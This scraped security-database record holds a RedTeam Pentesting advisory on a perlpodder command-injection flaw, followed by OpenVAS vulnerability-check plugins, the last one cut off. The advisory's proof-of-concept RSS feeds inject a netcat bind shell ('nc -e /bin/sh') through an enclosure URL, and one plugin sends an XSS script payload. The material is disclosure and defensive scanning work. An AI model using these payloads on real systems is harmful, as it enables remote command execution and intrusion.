RedTeam identified a security flaw in perlpodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.
Details
Product: perlpodder
Affected Versions: All versions up to perlpodder-0.4
Fixed Versions: perlpodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://perlpodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
Perlpodder is a podcatcher script written in perl. It automates
downloading podcasts.
(from perlpodder SourceForge page)
Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.
More Details
When perlpodder is used to fetch a podcast, perlpodder will extract the
URL of the audio-file from the XML-file the server provides. The URLs
are saved in the variable "$dlset". There are two occasions in the code
where this variable will be used together with the system() command:
The first usage is with "echo" to log the URL (line 278):
[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]
The second usage is with "wget" to actually fetch the audio file (line
294):
Unfortunately, $dlset is never properly sanitized, so it is possible for
the remote server to include arbitrary shell commands in the URL which
will then be executed using system() (lines 279 and 302).
Proof of Concept
A minimal malicious server rss feed which exploits the "echo" call may
look as follows:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
The URL above will open port 1337 via netcat on the victim's computer
and bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.
To exploit the "wget" call, the URL just has to be minimally adjusted:
High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of perlpodder (normally the user's
privileges).
History
2006-05-19 Discovery of the problem
2006-05-19 Notification of the author
2006-05-21 Fixed version of perlpodder is released
2006-05-22 Email from author pointing out the release
2006-05-22 Public release of the advisory without CVE
number because of public release by the
author. CVE will be appended when available.
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
repaired immediately.
As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.
More information about RedTeam can be found at
http://www.redteam-pentesting.de.
{"id": "SECURITYVULNS:DOC:12773", "bulletinFamily": "software", "title": "Perlpodder Remote Arbitrary Command Execution", "description": "Advisory: Perlpodder Remote Arbitrary Command Execution\r\n\r\nRedTeam identified a security flaw in perlpodder which makes it possible\r\nfor a malicious podcast server to execute arbitrary shell commands on\r\nthe victim's client.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: perlpodder\r\nAffected Versions: All versions up to perlpodder-0.4\r\nFixed Versions: perlpodder-0.5\r\nVulnerability Type: Remote arbitrary command execution\r\nSecurity-Risk: high\r\nVendor-URL: http://perlpodder.sourceforge.net/\r\nVendor-Status: informed, fixed\r\nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt\r\nAdvisory-Status: public\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nPerlpodder is a podcatcher script written in perl. It automates\r\ndownloading podcasts.\r\n\r\n(from perlpodder SourceForge page)\r\n\r\nPodcasting is the distribution of multimedia files over the internet.\r\nNormally, a server is providing an RSS or Atom XML feed describing where\r\nto get the multimedia files. The client parses the feed and may then\r\ndownload the desired files.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nWhen perlpodder is used to fetch a podcast, perlpodder will extract the\r\nURL of the audio-file from the XML-file the server provides. The URLs\r\nare saved in the variable "$dlset". There are two occasions in the code\r\nwhere this variable will be used together with the system() command:\r\n\r\nThe first usage is with "echo" to log the URL (line 278):\r\n\r\n[...]\r\n277 # add urls to log file to mark as retrieved\r\n278 $addurl = "echo " . $dlset . " >> $log_path ";\r\n279 system $addurl;\r\n[...]\r\n\r\nThe second usage is with "wget" to actually fetch the audio file (line\r\n294):\r\n\r\n[...]\r\n291 # Prepair to call wget\r\n292\r\n293 $wget_path = "$cwd". "$datadir" ;\r\n294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2 \r\n --timeout=20 --random-wait " . $dlset . " -P ". \r\n$wget_path ;\r\n295\r\n296 if ($DEBUG > 0) {\r\n297\r\n298 print "running " . $wget_cmd . "\n" ;\r\n299\r\n300 }\r\n301\r\n302 system $wget_cmd;\r\n[...]\r\n\r\nUnfortunately, $dlset is never properly sanitized, so it is possible for\r\nthe remote server to include arbitrary shell commands in the URL which\r\nwill then be executed using system() (lines 279 and 302).\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA minimal malicious server rss feed which exploits the "echo" call may\r\nlook as follows:\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<?xml-stylesheet type="text/xsl"?>\r\n<rss version="2.0">\r\n<channel>\r\n <title>RedTeam Pentesting Example Malicious Server Feed</title>\r\n\r\n <item>\r\n <enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc \r\n-e /bin/sh -l -p 1337 &amp;#"\r\n length="241734" type="audio/mpeg" />\r\n </item>\r\n</channel>\r\n</rss>\r\n\r\nThe URL above will open port 1337 via netcat on the victim's computer\r\nand bind a shell to it. This is just one example of how to exploit the\r\nvulnerability, as arbitrary commands can be included in the URL, but it\r\nshould illustrate the point.\r\n\r\nTo exploit the "wget" call, the URL just has to be minimally adjusted:\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<?xml-stylesheet type="text/xsl"?>\r\n<rss version="2.0">\r\n<channel>\r\n <title>RedTeam Pentesting</title>\r\n\r\n <item>\r\n <enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l \r\n-p 1337 &amp;#"\r\n length="241734" type="audio/mpeg" />\r\n </item>\r\n</channel>\r\n</rss>\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDo not use perlpodder with untrusted servers.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to perlpodder-0.5 immediately[1].\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nHigh, because arbitrary shell commands can be executed on the victim's\r\ncomputer with the privileges of perlpodder (normally the user's\r\nprivileges).\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2006-05-19 Discovery of the problem\r\n2006-05-19 Notification of the author\r\n2006-05-21 Fixed version of perlpodder is released\r\n2006-05-22 Email from author pointing out the release\r\n2006-05-22 Public release of the advisory without CVE\r\n number because of public release by the\r\n author. CVE will be appended when available.\r\n \r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] \r\nhttp://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download\r\n\r\n\r\nRedTeam\r\n=======\r\n\r\nRedTeam Pentesting is offering individual penetration tests, short\r\npentests, performed by a team of specialised IT-security experts.\r\nHereby, security weaknesses in company networks are uncovered and can be\r\nrepaired immediately.\r\n\r\nAs there are only few experts in this field, RedTeam wants to share its\r\nknowledge and enhance the public knowledge with research in security\r\nrelated areas. The results are made available as public security\r\nadvisories.\r\n\r\nMore information about RedTeam can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n-- \r\nRedTeam Pentesting Tel.: +49-(0)241-963 1300\r\nDennewartstr. 25-27 Fax : +49-(0)241-963 1304\r\n52068 Aachen http://www.redteam-pentesting.de", "published": "2006-05-23T00:00:00", "modified": "2006-05-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12773", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:17", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "dce5ea449568b0dddcf7a45c21a9fea8"}, {"key": "href", "hash": "24868d491086565acb475f432b6c209f"}, {"key": "modified", "hash": "60335d64e4a0c87d3f83d935babc3510"}, {"key": "published", "hash": "60335d64e4a0c87d3f83d935babc3510"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "f723bf23511ea193b076402225ae1340"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b3b47b3730f74be1e6a25d9a87a66385c652a8e09a6679828750de34c009587a", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:17"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": []}
{"openvas": [{"lastseen": "2018-12-13T17:37:47", "references": ["https://www.exploit-db.com/exploits/45958", "https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/"], "pluginID": "1361412562310113316", "description": "Adiscon LogAnalyzer is prone to an XSS vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-12-12T00:00:00", "title": "Adiscon LogAnalyzer <= 4.1.6 XSS Vulnerability", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19877"], "modified": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310113316", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113316", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adiscon_log_analyzer_xss_vuln_dec18.nasl 12773 2018-12-12 12:42:28Z jschulte $\n#\n# Adiscon LogAnalyzer <= 4.1.6 XSS Vulnerability\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113316\");\n script_version(\"$Revision: 12773 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-12 13:42:28 +0100 (Wed, 12 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 13:10:00 +0100 (Wed, 12 Dec 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-19877\");\n\n script_name(\"Adiscon LogAnalyzer <= 4.1.6 XSS Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_adiscon_log_analyzer_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"adiscon/log_analyzer/detected\");\n\n script_tag(name:\"summary\", value:\"Adiscon LogAnalyzer is prone to an XSS vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Tries to exploit the vulnerability and inject arbitrary HTML.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists within the /login.php page of the site,\n through the referer parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to inject arbitrary\n HTML or JavaScript into the site by crafting a malicious link.\");\n script_tag(name:\"affected\", value:\"Adiscon LogAnalyzer through version 4.1.6.\");\n script_tag(name:\"solution\", value:\"Update to version 4.1.7 or above.\");\n\n script_xref(name:\"URL\", value:\"https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/45958\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:adiscon:log_analyzer\";\n\ninclude( \"host_details.inc\" );\ninclude( \"http_func.inc\" );\ninclude( \"http_keepalive.inc\" );\ninclude( \"misc_func.inc\" );\ninclude( \"url_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! location = get_app_location( cpe: CPE, port: port ) ) exit( 0 );\n\nif( location == \"/\" )\n location = \"\";\n\nlocation = location + \"/login.php\";\n\nvt_strings = get_vt_strings();\nrand = vt_strings[\"default_rand\"];\n\nevil = '<script>alert(' + rand + ');</script>';\npayload = '%2Findex.php%22%3E' + urlencode( str: evil ) + '%3Cinput%20type%3D%22hidden%22%20name%3D%22none%22%20value%3D%223';\n\nurl = location + '?referer=' + payload;\n\nbuf = http_get_cache( port: port, item: url );\n\npattern = 'value=\"/index.php\">' + evil;\npattern = ereg_replace( pattern: \"\\(\", string: pattern, replace: \"\\(\" );\npattern = ereg_replace( pattern: \"\\)\", string: pattern, replace: \"\\)\" );\nif( egrep( pattern: pattern, string: buf ) ) {\n report = report_vuln_url( port: port, url: url );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-29T12:34:50", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813662", "description": "This host is installed with Adobe Acrobat Reader\n DC (Classic Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-29T12:34:50", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813662", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_reader_dc_classic_apsb18-21_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813662\");\n script_version(\"$Revision: 12120 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat Reader DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat Reader\n DC (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader DC (Classic Track)\n version 2015.006.30434 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2015.006.30434 == 15.006.30434\nif(version_is_less(version:vers, test_version:\"15.006.30434\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2015.006.30434\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:35:00", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813671", "description": "This host is installed with Adobe Acrobat Reader\n 2017 and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat Reader 2017 Multiple Vulnerabilities-apsb18-21 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-29T12:35:00", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813671", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813671", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_reader_2017_apsb18-21_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Adobe Acrobat Reader 2017 Multiple Vulnerabilities-apsb18-21 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813671\");\n script_version(\"$Revision: 12120 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", 